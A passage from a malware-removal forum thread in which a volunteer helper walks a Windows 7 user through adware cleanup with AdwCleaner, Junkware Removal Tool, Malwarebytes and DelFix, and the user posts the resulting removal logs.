Partition 2: (Not Active) - (Size=281.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=16.3 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=103 MB) - (Type=0C)

==================== End of Addition.txt ============================



#6
zep516

    Trusted Helper

  • Malware Removal
  • 8,093 posts
Please uninstall Adobe; it is way out of date. We'll install a fresh version later. Old versions of Adobe are risky.
Adobe Reader 9.5.5 MUI


Next

Please download adwCleaner to your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the logfile button and the log will open in Notepad.
  • Click on the Clean button and follow the prompts.
  • A log file will automatically open after the scan has finished and the PC has rebooted.
  • Please post the content of that log file with your next answer.
  • The report will be saved in the C:\AdwCleaner folder.

Next

Please download Junkware Removal Tool to your Desktop.
  • Please close your security software to avoid potential conflicts. See Here how to disable your security protection (Anti Virus)
  • Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete, depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.
  • Please post the contents of JRT.txt into your reply.

Next Malwarebytes scan.

  • Right click and choose "Run as administrator" to open Malwarebytes Anti-Malware and from the Dashboard please Check for Updates by clicking the Update Now... link
  • Open up Malwarebytes > Settings > Detection and Protection > Enable Scan for rootkit and under Non Malware Protection set both PUP and PUM to Treat detections as malware.
  • Click on the SCAN button and run a Threat Scan with Malwarebytes Anti-Malware by clicking the Scan Now>> button.
  • Once completed please click on the History > Application Logs and find your scan log and open it and then click on the "copy to clipboard" button and post back the results on your next reply.

In your next reply post:
  • The AdwCleaner [C1].txt Log
  • The JRT.txt Log
  • Malwarebytes log


#7
dreamtime

    New Member

  • Topic Starter
  • Member
  • Pip
  • 6 posts

Here are the logs.

 

# AdwCleaner v6.030 - Logfile created 01/12/2016 at 19:32:17
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-12-01.1 [Server]
# Operating System : Windows 7 Home Premium Service Pack 1 (X64)
# Username : Owner - OWNER-HP
# Running from : C:\Users\Owner\Desktop\adwcleaner_6.030.exe
# Mode: Clean
# Support : hxxps://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****

[-] Folder deleted: C:\Users\Owner\AppData\Local\PackageAware
[-] Folder deleted: C:\Users\Owner\AppData\Local\unitlayers
[-] Folder deleted: C:\Users\Owner\AppData\Local\YSearchUtil
[-] Folder deleted: C:\Users\Owner\AppData\Roaming\iWin
[-] Folder deleted: C:\Users\Owner\AppData\Roaming\WebCake
[-] Folder deleted: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games
[-] Folder deleted: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\iWin.com Games
[-] Folder deleted: C:\Program Files\Earth Networks
[-] Folder deleted: C:\Users\Owner\AppData\Local\VirtualStore\Program Files (x86)\Trymedia
[-] Folder deleted: C:\ProgramData\Free Ride Games
[-] Folder deleted: C:\ProgramData\GamesBar
[-] Folder deleted: C:\ProgramData\Trymedia
[#] Folder deleted on reboot: C:\ProgramData\Application Data\Free Ride Games
[#] Folder deleted on reboot: C:\ProgramData\Application Data\GamesBar
[#] Folder deleted on reboot: C:\ProgramData\Application Data\Trymedia
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GamesBar
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iWin
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iWin.com Games
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WeatherBug®
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pogo Games
[-] Folder deleted: C:\Program Files (x86)\Coupons
[-] Folder deleted: C:\Program Files (x86)\GamesBar
[-] Folder deleted: C:\Program Files (x86)\iWin
[-] Folder deleted: C:\Program Files (x86)\iWin.com Games
[-] Folder deleted: C:\Program Files (x86)\Trymedia
[-] Folder deleted: C:\Program Files (x86)\WebCake
[-] Folder deleted: C:\Program Files (x86)\Yahoo!\yset
[-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\YSearchUtil


***** [ Files ] *****

[-] File deleted: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\WeatherBug®.lnk
[-] File deleted: C:\Users\Owner\Desktop\WeatherBug®.lnk
[-] File deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eBay.lnk


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WebCakeUpdaterService
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WebCakeUpdaterService
[-] Key deleted: HKLM\SOFTWARE\Classes\GameTreatWidget.GameTreatWidget.1
[-] Key deleted: HKLM\SOFTWARE\Classes\Oberontb.Band
[-] Key deleted: HKLM\SOFTWARE\Classes\Oberontb.Band.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\GameTreatWidget.GameTreatWidget.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Oberontb.Band
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Oberontb.Band.1
[-] Key deleted: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{B302A1BD-0157-49FA-90F1-4E94F22C7B4B}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{FB684D26-01F4-4D9D-87CB-F486BEBA56DC}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{AD76633E-E50D-4844-9E7F-4DFBC7C18467}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1A93C934-025B-4C3A-B38E-9654A7003239}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{1A93C934-025B-4C3A-B38E-9654A7003239}
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35B-6118-11DC-9C72-001320C79847}]
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35C-6118-11DC-9C72-001320C79847}]
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKU\.DEFAULT\Software\ImInstaller
[-] Key deleted: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\gamesbar
[-] Key deleted: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\ImInstaller
[-] Key deleted: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\YahooPartnerToolbar
[-] Key deleted: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Earth Networks
[#] Key deleted on reboot: HKU\S-1-5-18\Software\ImInstaller
[#] Key deleted on reboot: HKCU\Software\gamesbar
[#] Key deleted on reboot: HKCU\Software\ImInstaller
[#] Key deleted on reboot: HKCU\Software\YahooPartnerToolbar
[#] Key deleted on reboot: HKCU\Software\Earth Networks
[-] Key deleted: HKU\.DEFAULT\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-18\Software\Updater By Sweetpacks
[-] Key deleted: HKLM\SOFTWARE\Conduit
[-] Key deleted: HKLM\SOFTWARE\gamesbar
[-] Key deleted: HKLM\SOFTWARE\GamesBarSetup
[-] Key deleted: HKLM\SOFTWARE\Trymedia Systems
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{DD85D6BF-4787-4A93-99A5-3F0CF0AE8834}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gamesbar
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Yahoo! SearchSet
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WeatherBug®
[#] Key deleted on reboot: [x64] HKCU\Software\gamesbar
[#] Key deleted on reboot: [x64] HKCU\Software\ImInstaller
[#] Key deleted on reboot: [x64] HKCU\Software\YahooPartnerToolbar
[#] Key deleted on reboot: [x64] HKCU\Software\Earth Networks
[-] Key deleted: [x64] HKLM\SOFTWARE\Tarma Installer
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\02F47BF73B948514FAACADD8CBBDF37D
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\080D9F5E1E95FEE4794CE438E635239E
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1E264E0A5959A1C46BA9175A878B12EA
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2E6768B6932D112438F047C54D180635
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\351716A953E21214898904032EAE2E81
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\397C771A7BCAC904697C3EC629ED33ED
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\69D6A6B2ED56AF24EA6335EAD6E91CA4
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7FFA128C2B0FF414D805FC5627883401
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\86EDC790504E1834DBC20C9A04328FD2
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\97C3D0F82E712E241A2F969F45E3351C
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\98CC8BF5A4A6E6C4ABF7051DDAB8B058
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9E7F556BF224D804D96A96F0F6344789
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A189D17A469616C4688D23E192996267
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BF4F885EDEE45644EB1E0C99E0162399
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CE21F3FD57B244142880EF15A165A156
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D15DAF33C220F91468A1D7D57C31ACD7
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D3BA76A44C779424889063D5098ED2D6
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D6D0EB9FDBD90C04D92A7E729058F10D
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E4748F9A4181FCE46A23C13B517B9420
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
[-] Value deleted: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Microsoft\Windows\CurrentVersion\Run [WeatherBug]
[#] Value deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Run [WeatherBug]
[#] Value deleted on reboot: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\Run [WeatherBug]
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\Extension.DLL
[-] Value deleted: HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [WeatherBug.exe]
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext [DisableAddonLoadTimePerformanceNotifications]


***** [ Web browsers ] *****

[-] [C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [10240 Bytes] - [01/12/2016 19:32:17]
C:\AdwCleaner\AdwCleaner[S0].txt - [9894 Bytes] - [01/12/2016 19:27:21]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [10387 Bytes] ##########
 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.9 (09.30.2016)
Operating System: Windows 7 Home Premium x64
Ran by Owner (Administrator) on Thu 12/01/2016 at 19:43:26.95
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 12

Successfully deleted: C:\Windows\couponprinter.ocx (File)
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\351ESB0Y (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NWM65HT1 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIM9VYU9 (Temporary Internet Files Folder)
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z9QB78JH (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\351ESB0Y (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NWM65HT1 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIM9VYU9 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z9QB78JH (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\SysWOW64\sho2A0D.tmp (File)
Successfully deleted: C:\Windows\SysWOW64\sho85E4.tmp (File)
Successfully deleted: C:\Windows\SysWOW64\shoE254.tmp (File)



Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 12/01/2016 at 19:51:00.25
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

 

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 12/1/2016
Scan Time: 7:55 PM
Logfile:
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.12.02.01
Rootkit Database: v2016.11.20.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Owner

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 324871
Time Elapsed: 24 min, 27 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 7
Adware.TryMedia, C:\Users\Owner\Desktop\JewelQuestSolitaire3-dm.exe, Quarantined, [7217a63c722801353124b689e31e14ec],
PUP.Optional.OpenCandy, C:\Users\Owner\Desktop\tm-Installer_JewelQuestMysteries.exe, Quarantined, [9ced6f73702a67cf964653dc808345bb],
PUP.Optional.OpenCandy, C:\Users\Owner\Desktop\tm-Installer_SlingoSupreme.exe, Quarantined, [4b3ec61c5e3c6ccac5177eb12bd8a55b],
Adware.TryMedia, C:\Users\Owner\Downloads\Spin_and_Win-v102-dm.exe, Quarantined, [dfaa2eb45f3bf145f2d191a7fe035ca4],
Adware.TryMedia, C:\Users\Owner\Downloads\PuzzleSolitaire-dm.exe, Quarantined, [aadffae8c2d888ae21a27cbcf60b8878],
PUP.Optional.OpenCandy, C:\Users\Owner\Downloads\tm-Installer_AARiddleoftheTwoKnights.exe, Quarantined, [6f1ab2301684be7837a549e650b318e8],
Adware.TryMedia, C:\Users\Owner\Desktop\Games\PuzzleSolitaire-dm.exe, Quarantined, [d0b98d55b3e74cea66ef053a9d649d63],

Physical Sectors: 0
(No malicious items detected)


(end)



#8
zep516

    Trusted Helper

  • Malware Removal
  • 8,093 posts
Hello,

Please uninstall the OLD version of Java:
Java 8 Update 65


What issues remain?

#9
dreamtime

    New Member

  • Topic Starter
  • Member
  • 6 posts

I've uninstalled the old Java. From what I can tell, there don't seem to be any more issues.



#10
zep516

    Trusted Helper

  • Malware Removal
  • 8,093 posts
Hello,

If there are no further issues,

We need to remove the tools we used and then close the topic.


The following procedures will implement some cleanup procedures to remove these tools. It will also reset your System Restore by flushing out previous restore points and create a new restore point. It will also remove all the backups our tools may have made.
Any leftover logs, files, folders or tools remaining on your Desktop which were not removed can be deleted manually (right-click the file + delete).


Why we need to remove some of our tools:
Some of the tools we have used to clean your computer were made by fellow malware fighters and are very powerful, and if used incorrectly or at the wrong time can make the computer an expensive paperweight. They are updated all the time, and some of them more than once a day, so by the time you are ready to use them again they will already be outdated.



Download DelFix by Xplode and save it to your desktop.
  • Run the tool by right-clicking the DelFix icon and choosing the Run as administrator option.
  • Make sure that these ones are checked:
    • Remove disinfection tools
    • Purge system restore
    • Reset system settings
  • Push Run.
  • The program will run for a few seconds and display a notepad report.
    Paste it for my review.


#11
dreamtime

    New Member

  • Topic Starter
  • Member
  • 6 posts

Okay, here you go.

 

 

# DelFix v1.013 - Logfile created 04/12/2016 at 14:01:37
# Updated 17/04/2016 by Xplode
# Username : Owner - OWNER-HP
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)

~ Removing disinfection tools ...

Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\Users\Owner\Desktop\FRST-OlderVersion
Deleted : C:\log.txt
Deleted : C:\TDSSKiller.3.1.0.12_26.11.2016_13.45.18_log.txt
Deleted : C:\Users\Owner\Desktop\Addition.txt
Deleted : C:\Users\Owner\Desktop\adwcleaner_6.040(1).exe
Deleted : C:\Users\Owner\Desktop\FRST.txt
Deleted : C:\Users\Owner\Desktop\FRST64.exe
Deleted : C:\Users\Owner\Desktop\JRT.exe
Deleted : C:\Users\Owner\Desktop\JRT.txt
Deleted : C:\Users\Owner\Downloads\adwcleaner_6.040.exe
Deleted : C:\Users\Owner\Downloads\tdsskiller.exe

~ Cleaning system restore ...

Deleted : RP #133 [Installed HP Support Assistant | 11/25/2016 22:41:05]
Deleted : RP #134 [Windows Modules Installer | 11/25/2016 23:46:00]
Deleted : RP #135 [Windows Modules Installer | 11/26/2016 09:54:50]
Deleted : RP #136 [Windows Modules Installer | 11/26/2016 09:56:47]
Deleted : RP #137 [Windows Update | 11/26/2016 09:59:57]
Deleted : RP #139 [Restore Point Created by FRST | 11/30/2016 20:09:48]
Deleted : RP #140 [Removed Adobe Reader 9.5.5 MUI. | 12/02/2016 00:16:43]
Deleted : RP #141 [JRT Pre-Junkware Removal | 12/02/2016 00:43:33]
Deleted : RP #142 [Removed Java 8 Update 65 | 12/04/2016 18:05:13]
Deleted : RP #143 [Removed Java 8 Update 65 | 12/04/2016 18:08:23]
Deleted : RP #144 [Restore Operation | 12/04/2016 18:25:21]
Deleted : RP #145 [JRT Pre-Junkware Removal | 12/04/2016 18:47:07]
Deleted : RP #146 [Removed Java 8 Update 65 | 12/04/2016 18:55:52]

New restore point created !

~ Resetting system settings ... OK

########## - EOF - ##########
 



#12
zep516

    Trusted Helper

  • Malware Removal
  • 8,093 posts
Well done !

You usually get infected because your security settings are too low.

Here are a number of recommendations that will help tighten them, and which will contribute to making you a less likely victim:

Safe Computing Practices please read Here


Since this issue appears to be resolved ... this Topic has been closed. Glad we could help.

If you're the topic starter, and need this topic reopened, please contact a staff member with the address of the thread.

Everyone else please begin a New Topic.

Thanks
Joe :)





